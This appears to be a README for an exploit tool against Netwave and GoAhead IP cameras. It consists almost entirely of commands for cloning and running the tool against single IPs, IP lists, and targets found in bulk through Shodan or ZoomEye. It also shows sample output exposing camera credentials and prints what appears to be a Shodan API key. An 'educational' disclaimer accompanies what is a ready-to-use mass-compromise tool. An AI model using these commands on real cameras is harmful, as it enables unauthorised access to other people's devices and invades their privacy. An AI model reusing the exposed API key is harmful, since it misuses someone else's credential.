Exploit Netwave and GoAhead IP Camera
Environment:Linux,Python3
Attention:this tool is just for educational!
Please comply with local laws and regulations!
-
git clone https://github.com/kienquoc102/Netwave-GoAhead-Exploits
-
pip3 install -r ./related.txt
-
cd Netwave-GoAhead-Exploits
-
python3 exploit.py -b 2 -l iplist.txt -v
-
python3 exploit.py -b 2 -v --shodan ( your API Key shodan )
Or:
-
python3 exploit.py -b 2 -l iplist.txt -v
-
Example: python3 exploit.py -b 1 -i [IP:PORT] -v
-
Demo: python3 exploit.py -b 1 -i 192.168.1.100:80 -v
*If you enter the same password as in the detected tool but can't log in, please leave it blank
*Example pasword Blank: IPCAM, ChinaNet, B-LINK-fuwuqi.....
there will be hacked ip and it says like this:
------------------------------------------------------------------------------------------------
[+]The ip:192.168.120.1,port:81,username:Location: /admin (Example IP)
[+]The ip:192.168.120.1,port:81,password:<meta name="generator" content="vBulletin 5.5.4" />
------------------------------------------------------------------------------------------------
then please leave that address, because it's not ip camera
python3 exploit.py -h
usage: exploit.py [-h] [-b {1,2}] [-o OUTPUTFILE] [-T TIMEOUT]
[-t TASKS] [-q | -v]
[-i IP | -l INPUTFILE | --shodan SHODAN | --zoomeye ZOOMEYE]
Exploit IP Camera. Please use it just in educational purpose!
optional arguments:
-h, --help show this help message and exit
-b {1,2},--brand {1,2}
Choose the brand of IP Camera. 1 represents Netwave,2
represents GoAhead.
-o OUTPUTFILE,--output OUTPUTFILE
Output into path you input.The default path in dir /tmp
-T TIMEOUT,--timeout TIMEOUT
The default timout for netwave is 300s.
-t TASKS,--task TASKS
Run TASKS number of connects in parallel,default is 10
-c COUNT,--count COUNT
The number of ip you want to get from ZoomEye.The maximum is 2000. Default is 100.
-q,--quiet Quiet mode.
-v,--verbose Show more informations.
-i IP,--ip IP The camera's ip and port.Example: 192.168.1.100:80
-l INPUTFILE,--list INPUTFILE
The camera's ip:port address file. The file's format
like this 192.168.1.100:80 in a line.
--shodan SHODAN
Your Shodan API Key. You can get help from https://www.shodan.io/
1.Victim IP Camera's brand is Netwave.The ip is 192.168.1.100 and port is 80.
python3 netwave_camera.py -b 1 -i 192.168.1.100:80 -v
2.Victim IP Camera's brand is GoAhead.The iplist.txt is given.
The iplist.txt show as below:
192.168.1.10:80
192.168.1.100:81
192.168.1.200:8080
python3 exploit.py -b 2 -l iplist.txt -v
3.Use Shodan API Key to exploit GoAhead.(The API Key is from shodan.io.)
python3 exploit.py -b 2 -v --shodan rrgYhgIMtnrPtfKdiVvWKtyQyY94goA0